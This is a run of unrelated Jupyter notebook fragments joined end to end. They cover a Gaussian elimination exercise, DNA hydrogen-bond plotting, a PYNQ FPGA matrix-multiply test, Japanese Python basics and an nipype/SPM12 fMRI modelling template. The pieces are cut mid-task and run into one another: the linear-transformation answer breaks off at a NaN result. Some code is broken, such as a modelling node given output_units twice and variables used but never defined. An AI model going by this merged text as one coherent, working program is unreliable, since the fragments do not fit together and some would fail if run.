augmented_matrix[row] -= normalised_row*element_to_zero pivot_row += 1 return augmented_matrix def solve_echelon( echelon_matrix ): """ Solves a matrix in reduced row echelon form, returning a column matrix of the solved variables. Arguments: 'echelon_matrix': The matrix to be solved in reduced row echelon form. Caveats: Only a matrix in reduced row echelon form will function properly. (square matrix augmented with a column constant matrix). """ #Ensure matrix is of correct echelon shape. number_rows, number_columns = np.shape( echelon_matrix ) assert number_columns == 1 + number_rows, 'The matrix is not in the correct echelon form.' #Separate the constants matrix from the reduced row echelon. constants = echelon_matrix[:,number_rows] echelon_matrix = echelon_matrix[:,:number_rows] variables = np.matrix( np.zeros( (number_rows, 1) )) #Initialise variables matrix. #Iterate over rows, starting at bottom of matrix, finishing at the top. for row in range( number_rows - 1, -1, -1 ): #Immediate assignment for the last row in the matrix. if row == number_rows - 1: variables[row] = constants[row] #General case, use matrix product to calculate the next corresponding unknown variable. else: variables[row] = constants[row] - echelon_matrix[row, row+1:]*variables[row+1:] return variables def gaussian_elimination( A, B ): """ Performs the full Gaussian elimination algorithm to solve the unknown variables matrix 'x' in equation form 'Ax = B'. A column matrix of the solved variables is returned. Arguments: Input the matrices 'A' and 'B' corresponding to this equation. Caveats: 'A' must be of square form. 'B' must have only 1 column and the same number of rows as 'A'. """ #Calculate the solved variables column matrix. solved_variables = solve_echelon( reduced_row_echelon( A, B ) ) return solved_variables #Example used in lectures: A = np.matrix([ [3., 4., 9.], [6., 7., 9.], [9., 10., 11.] ]) B = np.matrix([ [13.], [7.], [3.] ]) print("Variables [x3, x2, x1] are:\n", gaussian_elimination( A, B ))Variables [x3, x2, x1] are: [[-12.] [ 10.] [ 1.]]Part 2: Finding solution to a linear problemIn this part, you will be asked to use the functions you have implemented in part 1 to solve a simple problem. Problem statement You want to find a linear transformation given a set of points before and after the transformation.2a) try with the following set of pointsdef show_before_after(x,y): plt.plot(x[:,0], x[:,1], 'rx', y[:,0], y[:,1], 'go') plt.ylim([-5,5]) plt.xlim([-5,5]) plt.legend(('before', 'after'), loc=4) plt.title('Points before and after transformation') # matrix of points before transformation, one point per row x = np.matrix( [[ 1., 2. ], [ 2., 1. ], [ 0., 3. ], [ 2., 0.5]]) # matrix of points after transformation, one point per row y = np.matrix( [[ 2.75, 3.25 ], [ 3.25, 2.75 ], [ 2.25, 3.75 ], [ 2.875, 2.125]]) show_before_after(x,y) plt.show()We have here a problem of the form $Ax = B$, where $A$ is the transformation matrix to be found, $x$ is a matrix of points before transformation, and $B$ is a matrix of the points after the transformation. From looking at this problem I can see two immediate methods I could implement utilising the functions I have already made.Method 1) Using row reduction to calculate the inverse.By taking the first two points, I could say that:$$x = \begin{pmatrix} 1 & 2 \\ 2 & 1 \end{pmatrix}$$ and hence: $$B = \begin{pmatrix} 2.75 & 3.25 \\ 3.25 & 2.75 \end{pmatrix}$$#Initialise x x = np.matrix([ [1., 2.], [2., 1.]
]) #Initialise B B = np.matrix([ [2.75, 3.25], [3.25, 2.75] ])To find $A$, I could rearrange to formulate $A = Bx^{-1}$. So I need to calculate $x^{-1}$. This can be achieved by formulating the augmented matrix between $x$ and it's identity matrix:$$[A|I] = \begin{pmatrix} 1 & 2 \\ 2 & 1 \end{pmatrix} | \begin{pmatrix} 1 & 0 \\ 0 & 1 \end{pmatrix}$$identity = np.matrix([ [1., 0.], [0., 1.,] ])I then need to use operations to transform the left hand of the augmented matrix into the identity matrix, this will calculate $x^{-1}$ on the right hand side. I can use my "reduced_row_echelon" function to transform the left hand side into a reduced row echelon. I can then easily follow this up with a simple elementary row operation to produce the identity matrix as follows:#Convert to echelon form. augmented = reduced_row_echelon( x, identity ) print("Echelon form: \n", augmented, "\n") #Convert to Identity form with an elementary row operation. augmented[0] -= augmented[1]*augmented[0, 1] print("Identity form:\n", augmented, "\n")Echelon form: [[ 1. 2. 1. 0. ] [-0. 1. 0.66666667 -0.33333333]] Identity form: [[ 1. 0. -0.33333333 0.66666667] [-0. 1. 0.66666667 -0.33333333]]Now the right hand side is $x^{-1}$. Therefore the final operation to find the transformation matrix $A$ is to perform a matrix product between $B$ and $x^{-1}$:#Discard the left hand side identity matrix. x_inverse = augmented[:,2:4] print("Inverse of x:\n", x_inverse, "\n") #Perform the matrix product between x inverse, and B. transformation = B*x_inverse print("Transformation:\n", transformation)Inverse of x: [[-0.33333333 0.66666667] [ 0.66666667 -0.33333333]] Transformation: [[ 1.25 0.75] [ 0.75 1.25]]And so from above, I can conclude the transformation matrix ($A$) is: $$A = \begin{pmatrix} 1.25 & 0.75 \\ 0.75 & 1.25 \end{pmatrix}$$ Method 2) Simultaneous equation solving, (utilising both my functions).By assuming that the linear transformation matrix is 2x2, this can be modelled as follows:$$\begin{pmatrix} a & b \\ c & d \end{pmatrix}$$ By performing matrix product on each of the first sets of points, and equalling to the corresponding transformed points I can reduce down a set of simultaneous equations that can be used to solve the variables in the matrix:$3a + 3b = 6$$2a + 3.5b = 5.125$$3c + 3d = 6$$2c + 3.5d = 5.875$I can formulate this problem using matrices:Solving for $a$ and $b$:$$\begin{pmatrix} 3 & 3 \\ 2 & 3.5 \end{pmatrix} \begin{pmatrix} a \\ b \end{pmatrix} = \begin{pmatrix} 6 \\ 5.125 \end{pmatrix}$$ Solving for $c$ and $d$:$$\begin{pmatrix} 3 & 3 \\ 2 & 3.5 \end{pmatrix} \begin{pmatrix} c \\ d \end{pmatrix} = \begin{pmatrix} 6 \\ 5.875 \end{pmatrix}$$ I implement this below:ab_coefficients = np.matrix([ [3., 3.], [2., 3.5,] ]) ab_constants = np.matrix([ [6.], [5.125] ]) cd_coefficients = np.matrix([ [3., 3.], [2., 3.5,] ]) cd_constants = np.matrix([ [6.], [5.875] ]) #Perform the full gaussian elimination. ab = gaussian_elimination( ab_coefficients, ab_constants ) cd = gaussian_elimination( cd_coefficients, cd_constants ) print("a and b solutions: \n", ab, "\n") print("c and d solutions: \n", cd, "\n") #construct the transformation matrix from the answers. transformation = np.vstack( [ab.T, cd.T] ) print("transformation:\n", transformation)a and b solutions: [[ 1.25] [ 0.75]] c and d solutions: [[ 0.75] [ 1.25]] transformation: [[ 1.25 0.75] [ 0.75 1.25]]I get the same result as method 1. 
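As a quick sanity check (a small added sketch, not from the original exercise), the recovered matrix can be applied to all four points from part 2a, using only objects already defined above:
#(Added check) rows of pts_before are points, so we multiply by the transpose of the transformation
pts_before = np.matrix([[1., 2.], [2., 1.], [0., 3.], [2., 0.5]])
pts_after = np.matrix([[2.75, 3.25], [3.25, 2.75], [2.25, 3.75], [2.875, 2.125]])
print(np.allclose(pts_before * transformation.T, pts_after)) #Expect True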
This method is arguably simpler and utilises both functions.$$\begin{pmatrix} a & b \\ c & d \end{pmatrix} = \begin{pmatrix} 1.25 & 0.75 \\ 0.75 & 1.25 \end{pmatrix}$$ 2b) Test your approach on the following points. Explain what happens.x1 = [ [ 1, 2], [ 2, 4], [-1, -2], [ 0, 0]] y1 = [ [ 5, 10], [10, 20], [-1, -2], [-2, -4]] #Initialise x x = np.matrix([ [1., 2.], [2., 4.] ]) #Initialise B B = np.matrix([ [5., 10.], [10., 20.] ]) identity = np.matrix([ [1., 0.], [0., 1.,] ]) print(reduced_row_echelon( x, identity ))[[ 1. 2. 1. 0.] [ nan nan -inf inf]]Part 1: Single plot for Big 5000ns Windowhost = 'tat_21mer' n_bp = 21 time_label = '0_5000' rootfolder = '/home/ytcdata/bigtraj_fluctmatch/5000ns' h_agent = HBAgent(host, rootfolder, n_bp, time_label) h_agent.initialize_basepair() xticks = range(1, 22) ylim = (-0.5, 26) fig, ax = plt.subplots(nrows=1, ncols=1, figsize=(14,5)) typename = 'type1' resids, klist = h_agent.get_resid_klist_all(typename) ax.plot(resids, klist, '-o', label=typename) typename = 'type2' resids, klist = h_agent.get_resid_klist_all(typename) ax.plot(resids, klist, '-o', label=typename) typename = 'type3' resids, klist = h_agent.get_resid_klist_all(typename) ax.plot(resids, klist, '-o', label=typename) ax.set_title(abbr_hosts[host], fontsize=14) ax.legend(fontsize=14) ax.set_xticks(xticks) ax.axvline(3, color='red', alpha=0.5) ax.axvline(19, color='red', alpha=0.5) for yvalue in range(5,26,5): ax.axhline(yvalue, color='grey', alpha=0.1) ax.tick_params(axis='both', labelsize=14) ax.set_xlabel('Resid', fontsize=14) ax.set_ylabel('k (kcal/mol/Å$^2$)', fontsize=14) ax.set_ylim(ylim) plt.tight_layout() #plt.savefig(f'/home/yizaochen/Desktop/drawzone_temp/{host}_hb.svg') plt.show()Part 2: Split-5host = 'tat_21mer' bigtraj_folder = '/home/ytcdata/bigtraj_fluctmatch/split_5' n_bp = 21 only_central = False split_5 = True one_big_window = False h_agent = HBAgentBigTraj(host, bigtraj_folder, n_bp, only_central, split_5, one_big_window) h_agent.initialize_basepair() xticks = range(1, 22) ylim = (-0.5, 26) fig, ax = plt.subplots(nrows=1, ncols=1, figsize=(14,5)) typename = 'type1' resids, kmean, kstd = h_agent.get_resid_klist_all(typename) ax.errorbar(resids, kmean, yerr=kstd, marker='o', capsize=10, label=typename) typename = 'type2' resids, kmean, kstd = h_agent.get_resid_klist_all(typename) ax.errorbar(resids, kmean, yerr=kstd, marker='o', capsize=10, label=typename) typename = 'type3' resids, kmean, kstd = h_agent.get_resid_klist_all(typename) ax.errorbar(resids, kmean, yerr=kstd, marker='o', capsize=10, label=typename) title = f'{abbr_hosts[host]} Split-5' ax.set_title(title, fontsize=14) ax.legend(fontsize=14) ax.set_xticks(xticks) ax.axvline(3, color='red', alpha=0.5) ax.axvline(19, color='red', alpha=0.5) for yvalue in range(5,26,5): ax.axhline(yvalue, color='grey', alpha=0.1) ax.tick_params(axis='both', labelsize=14) ax.set_xlabel('Resid', fontsize=14) ax.set_ylabel('k (kcal/mol/Å$^2$)', fontsize=14) #ax.set_ylim(ylim) plt.tight_layout() #plt.savefig(f'/home/yizaochen/Desktop/drawzone_temp/{host}_split5_hb.svg') plt.show()Part 3: Moving Window, Window Size: 1000nshost = 'atat_21mer' bigtraj_folder = '/home/ytcdata/bigtraj_fluctmatch' n_bp = 21 only_central = False split_5 = False one_big_window = False interval_time = 500 h_agent = HBAgentBigTraj(host, bigtraj_folder, n_bp, only_central, split_5, one_big_window, interval_time) h_agent.initialize_basepair() k_container = h_agent.get_k_container() resid_list = list(range(1, n_bp+1)) typelist = ['type1', 'type2', 'type3'] 
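# (Added comment) the block below collects, for each hydrogen-bond type, an array of shape
# (n_window, number of residues) of force constants: one row per trajectory window,
# one column per resid, filled from k_container.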
n_window = 19 # 9, 19, 39 n_points = len(resid_list) * len(typelist) data_type1 = np.zeros((n_window, len(resid_list))) data_type2 = np.zeros((n_window, len(resid_list))) data_type3 = np.zeros((n_window, len(resid_list))) datalist = [data_type1, data_type2, data_type3] for typename, data_type in zip(typelist, datalist): col_id = 0 for resid in resid_list: data_type[:, col_id] = k_container[resid][typename] col_id += 1 fig, axes = plt.subplots(nrows=3, ncols=1, figsize=(8,6), sharey=True) ylim = (-0.5, 13) yticks = range(0,13,2) ax = axes[0] c = 'tab:blue' ax.boxplot(data_type1, patch_artist=True, boxprops=dict(facecolor=c, color='black'), medianprops=dict(color='blue')) title = f'{abbr_hosts[host]} Moving Window' ax.set_title(title) legend_elements = [Patch(facecolor=c, edgecolor='black', label='type1')] ax.legend(handles=legend_elements, loc='upper right') ax.set_ylabel('k (kcal/mol/Å$^2$)', fontsize=12) for yvalue in range(0,14,2): ax.axhline(yvalue, color='grey', alpha=0.1) ax.set_ylim(ylim) ax.set_yticks(yticks) ax = axes[1] c = 'tab:orange' ax.boxplot(data_type2, patch_artist=True, boxprops=dict(facecolor=c, color='black'), medianprops=dict(color='blue')) legend_elements = [Patch(facecolor=c, edgecolor='black', label='type2')] ax.legend(handles=legend_elements, loc='upper right') ax.set_ylabel('k (kcal/mol/Å$^2$)', fontsize=12) for yvalue in range(0,14,2): ax.axhline(yvalue, color='grey', alpha=0.1) ax.set_ylim(ylim) ax = axes[2] c = 'tab:green' ax.boxplot(data_type3, patch_artist=True, boxprops=dict(facecolor=c, color='black'), medianprops=dict(color='blue')) legend_elements = [Patch(facecolor=c, edgecolor='black', label='type3')] ax.legend(handles=legend_elements, loc='upper right') ax.set_ylabel('k (kcal/mol/Å$^2$)', fontsize=12) for yvalue in range(0,14,2): ax.axhline(yvalue, color='grey', alpha=0.1) ax.set_ylim(ylim) ax.set_xlabel('Resid', fontsize=12) plt.tight_layout() #plt.savefig(f'/home/yizaochen/Desktop/drawzone_temp/{host}_hb_moving_window_500ns.svg') plt.show() xticks = range(1, 22) ylim = (-0.5, 26) fig, ax = plt.subplots(nrows=1, ncols=1, figsize=(14,5)) resids = range(1,22) sele_frame = 0 typename = 'type1' klist = [k_container[resid][typename][sele_frame] for resid in resids] ax.plot(resids, klist, '-o', label=typename) typename = 'type2' klist = [k_container[resid][typename][sele_frame] for resid in resids] ax.plot(resids, klist, '-o', label=typename) typename = 'type3' klist = [k_container[resid][typename][sele_frame] for resid in resids] ax.plot(resids, klist, '-o', label=typename) title = f'{abbr_hosts[host]} Split-5' ax.set_title(title, fontsize=14) ax.legend(fontsize=14) ax.set_xticks(xticks) ax.axvline(3, color='red', alpha=0.5) ax.axvline(19, color='red', alpha=0.5) for yvalue in range(5,26,5): ax.axhline(yvalue, color='grey', alpha=0.1) ax.tick_params(axis='both', labelsize=14) ax.set_xlabel('Resid', fontsize=14) ax.set_ylabel('k (kcal/mol/Å$^2$)', fontsize=14) #ax.set_ylim(ylim) plt.tight_layout() #plt.savefig(f'/home/yizaochen/Desktop/drawzone_temp/{host}_split5_hb.svg') plt.show()mmult unit testimport numpy as np import cffi from pynq import Overlay # load Base Overlay Overlay("/home/xilinx/pynq/bitstream/base.bit").download() import sys sys.path.append("..") from pynq_chainer import overlays from pynq_chainer import utils from pynq.drivers import xlnk mmu = xlnk.xlnk() mmu.xlnk_reset() mmult = overlays.BinMmult() ffi = cffi.FFI() def debug_cdata(name, cdata, show=True): if not show: return print(name) for i in range(5): print(cdata[i]) dtype = "int" 
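# (Added comment, assumption) dtype is the element-type string handed to the CMA allocation helpers,
# while npdtype is the matching numpy dtype; both are assumed to describe the same 32-bit integer layout.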
npdtype = np.int32 def test(debug=False): ffi = cffi.FFI() x_size = (1, 32) w_size = (16, 32) x = np.random.randint(-255, 255, x_size) w = np.random.randint(-255, 255, w_size) # HW x_hw = np.where(x>=0, 1, 0).astype(npdtype, copy=True) w_hw = np.where(w>=0, 1, 0).astype(npdtype, copy=True).T.copy() # SW x_sw = np.where(x>=0, 1, -1).astype(np.float32, copy=True) w_sw = np.where(w>=0, 1, -1).astype(np.float32, copy=True) x_nrows, x_ncols = x.shape w_nrows, w_ncols = w.shape y_hw, y_cdata = utils.malloc_cma_ndarray((w_nrows, x_nrows), dtype, npdtype) x_hw, x_cdata = utils.copy_cma_ndarray(x_hw, dtype) #w_, w_cdata = utils.copy_cma_ndarray(w.T.copy(), dtype) w_hw, w_cdata = utils.copy_cma_ndarray(w_hw, dtype) if debug: print('x', x_cdata) print('w', w_cdata) print('y', y_cdata) debug_cdata("x", x_cdata) debug_cdata("w", w_cdata) debug_cdata("y", y_cdata) mmult(x_cdata, w_cdata, y_cdata, w_nrows, x_ncols) debug_cdata("y", y_cdata) y_sw = x_sw.dot(w_sw.T) y_hw = y_hw.T debug_cdata("y", y_cdata) if debug: print("Actual(C):") print(y_hw) print("Expected(NumPy):") print(y_sw) if np.allclose(y_hw, y_sw, rtol=1e-04, atol=1e-04): print("OK") else: print("NG") mmu.cma_free(x_cdata) mmu.cma_free(w_cdata) mmu.cma_free(y_cdata) for i in range(1): test(debug=True) L = 784 M = 32 x_size = (1, 1024) w_size = (1024, 1024) x = np.ones(x_size).astype(npdtype) w = np.ones(w_size).astype(npdtype) x_nrows, x_ncols = x.shape w_nrows, w_ncols = w.shape y, y_cdata = utils.malloc_cma_ndarray((w_nrows, x_nrows), dtype, npdtype) # x, x_cdata = utils.copy_cma_ndarray(x, dtype) # w_, w_cdata = utils.copy_cma_ndarray(w, dtype) w_ = w.T.copy() w_size = (784,1024) x, x_cdata = utils.malloc_cma_ndarray(x_size, dtype, npdtype) w_, w_cdata = utils.malloc_cma_ndarray(w_size, dtype, npdtype) w_.shape %timeit -n 1 -o x.dot(w.T) %timeit -n 1 -o mmult(x_cdata, w_cdata, y_cdata, w_nrows, x_ncols)1 loop, best of 3: 18.6 ms per loopファイル操作f = open('todo.txt', encoding='utf-8') todo_str = f.read() print(todo_str) f.close() with open('todo.txt', encoding='utf-8') as f: todo_str = f.read() print(todo_str) f = open('memo.txt', 'w', encoding='utf-8') f f.write('今日は') f.write('ラーメンが食べたい\n') f.close() f = open('memo.txt', 'a', encoding='utf-8') f.write('夕飯は何にしよう\n') f.close() f = open('photo.png', 'rb') content = f.read() content[:8]モジュールimport calc calc calc.add(1, 2) from calc import add add(1, 2) import calc as c c.add(1, 2) from calc import add, sub add(1, 2) sub(2, 1) from calc import ( add, sub, )標準ライブラリの利用import re m = re.search('(P(yth|l)|Z)o[pn]e?', 'Python') m m[0] m.group(0) m = re.search('py(thon)', 'python') m[0] m[1] re.search('py', 'ruby')Building first level models using _nipype_ and _SPM12_ Base functionality for _megameta_ project------- History* 9/18/19 hychan - include option for using custom event TSV* 4/9/19 cscholz - made small correction to make_contrast_list() (setting: -1/neg_length instead of -1/pos_length)* 4/2/19 mbod - split out processing pipeline for revised workflow* 3/28/19 mbod - update pipeline to include resampling to template & SPM path reference* 3/23/19 mbod - include contrast definition in the config JSON file* 3/9/19 mbod - updates from testing template with `darpa1`* 2/27/19 mbod - modify example notebook to make base functionality notebook----- Description* Set up a nipype workflow to use SPM12 to make first level models for _megameta_ task data (preprocessed using `batch8` SPM8 scripts) in BIDS derivative format ------------------- Template variables* Specify the following values: 1. 
project name - should be name of folder under `/data00/project/megameta`, e.g. `project1` 2. filename for JSON model specification (should be inside `model_specification` folder), e.g. `p1_image_pmod_likeme.json` 3. TR value in seconds ------------------- Setup* import required modules and define parametersimport os # system functions # NIYPE FUNCTIONS import nipype.interfaces.io as nio # Data i/o import nipype.interfaces.spm as spm # spm import nipype.interfaces.matlab as mlab # how to run matlab import nipype.interfaces.utility as util # utility import nipype.pipeline.engine as pe # pypeline engine import nipype.algorithms.modelgen as model # model specification from nipype.interfaces.base import Bunch from nipype.algorithms.misc import Gunzip from itertools import combinations from nilearn import plotting, image from nistats import thresholding from IPython.display import Image import scipy.io as sio import numpy as np import json import pandas as pd/usr/local/anaconda3/lib/python3.6/importlib/_bootstrap.py:205: ImportWarning: can't resolve package from __spec__ or __package__, falling back on __name__ and __path__ return f(*args, **kwds) /usr/local/anaconda3/lib/python3.6/importlib/_bootstrap.py:205: RuntimeWarning: numpy.dtype size changed, may indicate binary incompatibility. Expected 96, got 88 return f(*args, **kwds)Matlab path# Set the way matlab should be called mlab.MatlabCommand.set_default_matlab_cmd("matlab -nodesktop -nosplash") # If SPM is not in your MATLAB path you should add it here mlab.MatlabCommand.set_default_paths(PATH_TO_SPM_FOLDER)Parameters* These need to be reformatted to be consistent* as data is not smoothed commented out the `fwhm_size` param - but data probably has a value Load JSON model configJSON_MODEL_FILE = os.path.join('/data00/projects/megameta/scripts/jupyter_megameta/first_level_models', PROJECT_NAME, 'model_specifications', MODEL_SPEC_FILE) with open(JSON_MODEL_FILE) as fh: model_def = json.load(fh) TASK_NAME = model_def['TaskName'] RUNS = model_def['Runs'] MODEL_NAME = model_def['ModelName'] PROJECT_NAME = model_def['ProjectID'] PROJECT_DIR = os.path.join('/data00/projects/megameta', PROJECT_NAME) SUBJ_DIR = os.path.join(PROJECT_DIR, 'derivatives', 'nipype', 'resampled_and_smoothed') task_func_template = "sr{PID}_task-{TASK}_run-0{RUN}_space-MNI152-T1-1mm_desc-preproc_bold.nii" subject_list = [subj for subj in os.listdir(SUBJ_DIR) if os.path.exists(os.path.join(SUBJ_DIR,subj,'medium', 'fwhm_8', task_func_template.format(PID=subj, TASK=TASK_NAME, RUN=1)))] output_dir = os.path.join(PROJECT_DIR,'derivatives', 'nipype','model_{}_{}'.format(TASK_NAME.upper(), MODEL_NAME)) # name of 1st-level output folder working_dir = os.path.join(PROJECT_DIR, 'working', 'nipype', 'workingdir_model_{}_{}'.format(TASK_NAME.upper(), MODEL_NAME)) # name of 1st-level working directory # check to see if output and work directories exist if not os.path.exists(output_dir): os.makedirs(output_dir) if not os.path.exists(working_dir): os.makedirs(working_dir) try: subject_list = [ s for s in subject_list if s not in exclude_subjects ] print('\n\nApplied subject exclusion list:\n\t',' '.join(exclude_subjects)) except: print('\n\nNo subject exclusions applied') try: subject_list = [ s for s in subject_list if s in include_subjects ] print('\n\nApplied subject inclusion list:\n\t',' '.join(include_subjects)) except: print('\n\nNo subject inclusions applied') print('\n\nSUBJECT LIST IS:\n\t', ' '.join(subject_list))No subject exclusions applied No subject inclusions appliedUtility 
functions for subject info and contrasts Setup design matrix data for subject* need a function to set up the nipype `Bunch` format used * https://nipype.readthedocs.io/en/latest/users/model_specification.html* read the onsets/dur/conditions from task logs and extract needed datadef get_subject_info(subject_id, model_path, DEBUG=False): ''' 1. load model specification from JSON spec file 2. get confound file for subject for task to add to design matrix 3. get task spec CSV for subject for task 4. setup subject info structure ''' import os import pandas as pd import json from nipype.interfaces.base import Bunch def make_pmod(df, conditions, pmods={}, normalize='mean'): pmod = [] for cond in conditions: if not pmods.get(cond): pmod.append(None) else: df2 = df[df.trial_type==cond] pmod_name = pmods.get(cond) #pmod = [pmod] if not type(pmods) is list else pmod # MAKE SURE THERE IS VARIANCE IN PMOD VECTOR if df2[pmod_name].var()==0: #df2[pmod_name]+=0.001 pmod.append(None) continue # APPLY NORMALIZATION if normalize=='mean': df2[pmod_name] = df2[pmod_name] - df2[pmod_name].mean() pmod.append(Bunch(name=[pmod_name], param=[df2[pmod_name].values.tolist() ], poly=[1] )) return pmod def map_spec_to_model(spec_df,model): """ Maps spec trial names to model contrast trials. Args: spec: the events.tsv spec file model: the model.json file Returns: pandas dataframe object """ spec=spec_df.copy() for con in model['Conditions']: spec_trials = model['Conditions'][con] spec.loc[spec.trial_type.isin(spec_trials),'trial_type'] = con spec.onset.sort_values() return spec with open(model_path) as fh: model_def = json.load(fh) pmod = None if not model_def.get('Modulators') else [] TASK_NAME = model_def['TaskName'] TASK_RUNS = model_def['Runs'] MODEL_NAME = model_def['ModelName'] PROJECT_ID = model_def['ProjectID'] condition_names = list(model_def['Conditions'].keys()) PROJECT_DIR = os.path.join('/data00/projects/megameta', PROJECT_ID) SUBJ_DIR = os.path.join(PROJECT_DIR,'derivatives', 'batch8') realign_files = [] subject_info = [] if model_def.get('CustomEventDir'): EVENT_DIR = model_def['CustomEventDir'] else: EVENT_DIR = os.path.join(SUBJ_DIR, subject_id, 'func') # check to see which runs exist for subject # by looking for appropriate events.tsv files # this could (should?) also include looking for the nifti file? 
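# (added comment) a run is kept for this subject only if its *_events.tsv file exists in EVENT_DIR;
# runs without an events file are silently skipped rather than raising an error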
runs_for_subj = [run for run in TASK_RUNS if os.path.exists(os.path.join(EVENT_DIR, '{}_task-{}_run-0{}_events.tsv'.format(subject_id, TASK_NAME, run))) ] if DEBUG: print("runs_for_subj", runs_for_subj) print("checked paths:") for run in TASK_RUNS: print('\t', os.path.join(EVENT_DIR, '{}_task-{}_run-0{}_events.tsv'.format(subject_id, TASK_NAME, run))) print("TASK NAME", TASK_NAME) print("pmod", pmod) print("TASK_RUNS", TASK_RUNS) print("subject_id", subject_id) for run_num, _ in enumerate(runs_for_subj,1): events_df = pd.read_csv(os.path.join(EVENT_DIR, '{}_task-{}_run-0{}_events.tsv'.format(subject_id, TASK_NAME, run_num)), sep='\t') onsets_df = map_spec_to_model(events_df, model_def) realign_file = os.path.join(PROJECT_DIR, 'working','nipype', 'workingdir_model_{}_{}'.format(TASK_NAME.upper(),MODEL_NAME), '{}-run-0{}-realign.txt'.format(subject_id, run_num)) confound_file=os.path.join(SUBJ_DIR, subject_id, 'func', '{}_task-{}_run-0{}_desc-confounds-regressors.tsv'.format(subject_id, TASK_NAME, run_num) ) confound_df = pd.read_csv(confound_file, sep='\t') cols_to_use = [ 'TransX','TransY', 'TransZ', 'RotX', 'RotY', 'RotZ'] confound_df[cols_to_use].to_csv(realign_file, header=False, index=False, sep='\t') realign_files.append(realign_file) onsets = [] dur = [] for cond in model_def['Conditions']: onsets.append(onsets_df[onsets_df.trial_type==cond].onset.values) dur.append(onsets_df[onsets_df.trial_type==cond].duration.values) #pmod = make_pmod(rdf, condition_names) if model_def.get('Modulators'): pmod = make_pmod(onsets_df, condition_names, pmods=model_def['Modulators']) subject_info.append(Bunch(conditions=condition_names, onsets=onsets, durations=dur, amplitudes=None, tmod=None, pmod=pmod, regressor_names=None, regressors=None)) DM_regressors = [] for cond in condition_names: DM_regressors.append(cond) if pmod and model_def['Modulators'].get(cond): DM_regressors.append('{}x{}^1'.format(cond, model_def['Modulators'].get(cond))) return subject_info, realign_files, DM_regressorsSet up contrasts* This part of the template needs work to provide a cleaner way to specify contrasts* Could use the same vector contrasts approach as we have in batch8 and then have a function to convert this into the list of list data structure that nipype spm contrasts node looks fordef make_contrast_list(subject_id, condition_names, model_path, DEBUG=False): import json condition_names.append('constant') cont = [] for idx, cname in enumerate(condition_names): ccode = [0 if pos!=idx else 1 for pos in range(len(condition_names))] cont.append([cname, 'T', condition_names, ccode]) # add custom contrasts from the JSON model file with open(model_path) as fh: model_def = json.load(fh) contrasts = model_def.get('Contrasts') if not contrasts: return cont for contrast in contrasts: cname = contrast['name'] pos_idx = [condition_names.index(p) for p in contrast['pos']] neg_idx = [condition_names.index(n) for n in contrast['neg']] pos_length = len(contrast['pos']) neg_length = len(contrast['neg']) ccode = [] for idx, _ in enumerate(condition_names): if idx in pos_idx: ccode.append(1/pos_length) elif idx in neg_idx: ccode.append(-1/neg_length) else: ccode.append(0) cont.append([cname, 'T', condition_names, ccode]) if DEBUG: print(contrast) print(ccode) return contSet up processing nodes for modeling workflow Specify model node# SpecifyModel - Generates SPM-specific Model modelspec = pe.Node(model.SpecifySPMModel(concatenate_runs=False, input_units='secs', output_units='secs', time_repetition=TR, high_pass_filter_cutoff=128), 
output_units = 'scans', name="modelspec")Level 1 Design node** TODO -- get the right matching template file for fmriprep *** ??do we need a different mask than: `'/data00/tools/spm8/apriori/brainmask_th25.nii'`# Level1Design - Generates an SPM design matrix level1design = pe.Node(spm.Level1Design(bases={'hrf': {'derivs': [0, 0]}}, timing_units='secs', interscan_interval=TR, model_serial_correlations='none', #'AR(1)', mask_image = '/data00/tools/spm8/apriori/brainmask_th25.nii', global_intensity_normalization='none' ), name="level1design")Estimate Model node# EstimateModel - estimate the parameters of the model level1estimate = pe.Node(spm.EstimateModel(estimation_method={'Classical': 1}), name="level1estimate")Estimate Contrasts node# EstimateContrast - estimates contrasts conestimate = pe.Node(spm.EstimateContrast(), name="conestimate")Setup pipeline workflow for level 1 model# Initiation of the 1st-level analysis workflow l1analysis = pe.Workflow(name='l1analysis') # Connect up the 1st-level analysis components l1analysis.connect([(modelspec, level1design, [('session_info', 'session_info')]), (level1design, level1estimate, [('spm_mat_file', 'spm_mat_file')]), (level1estimate, conestimate, [('spm_mat_file', 'spm_mat_file'), ('beta_images', 'beta_images'), ('residual_image', 'residual_image')]) ])Set up nodes for file handling and subject selection `getsubjectinfo` node * Use `get_subject_info()` function to generate spec data structure for first level model design matrix# Get Subject Info - get subject specific condition information getsubjectinfo = pe.Node(util.Function(input_names=['subject_id', 'model_path'], output_names=['subject_info', 'realign_params', 'condition_names'], function=get_subject_info), name='getsubjectinfo') makecontrasts = pe.Node(util.Function(input_names=['subject_id', 'condition_names', 'model_path'], output_names=['contrasts'], function=make_contrast_list), name='makecontrasts')`infosource` node* iterate over list of subject ids and generate subject ids and produce list of contrasts for subsequent nodes# Infosource - a function free node to iterate over the list of subject names infosource = pe.Node(util.IdentityInterface(fields=['subject_id', 'model_path', 'resolution', 'smoothing'] ), name="infosource") try: fwhm_list = smoothing_list except: fwhm_list = [4,6,8] try: resolution_list = resolutions except: resolution_list = ['low','medium','high'] infosource.iterables = [('subject_id', subject_list), ('model_path', [JSON_MODEL_FILE]*len(subject_list)), ('resolution', resolution_list), ('smoothing', ['fwhm_{}'.format(s) for s in fwhm_list]) ]`selectfiles` node* match template to find source files (functional) for use in subsequent parts of pipeline# SelectFiles - to grab the data (alternativ to DataGrabber) ## TODO: here need to figure out how to incorporate the run number and task name in call templates = {'func': '{subject_id}/{resolution}/{smoothing}/sr{subject_id}_task-'+TASK_NAME+'_run-0*_space-MNI152-T1-1mm_desc-preproc_bold.nii'} selectfiles = pe.Node(nio.SelectFiles(templates, base_directory='/data00/projects/megameta/{}/derivatives/nipype/resampled_and_smoothed'.format(PROJECT_NAME)), working_dir=working_dir, name="selectfiles")Specify datasink node* copy files to keep from various working folders to output folder for model for subject# Datasink - creates output folder for important outputs datasink = pe.Node(nio.DataSink(base_directory=SUBJ_DIR, parameterization=True, #container=output_dir ), name="datasink") datasink.inputs.base_directory = output_dir # 
Use the following DataSink output substitutions
substitutions = [] subjFolders = [('_model_path.*resolution_(low|medium|high)_smoothing_(fwhm_\\d{1,2})_subject_id_sub-.*/(.*)$', '\\1/\\2/\\3')] substitutions.extend(subjFolders) datasink.inputs.regexp_substitutions = substitutions
---------
Set up workflow for whole process
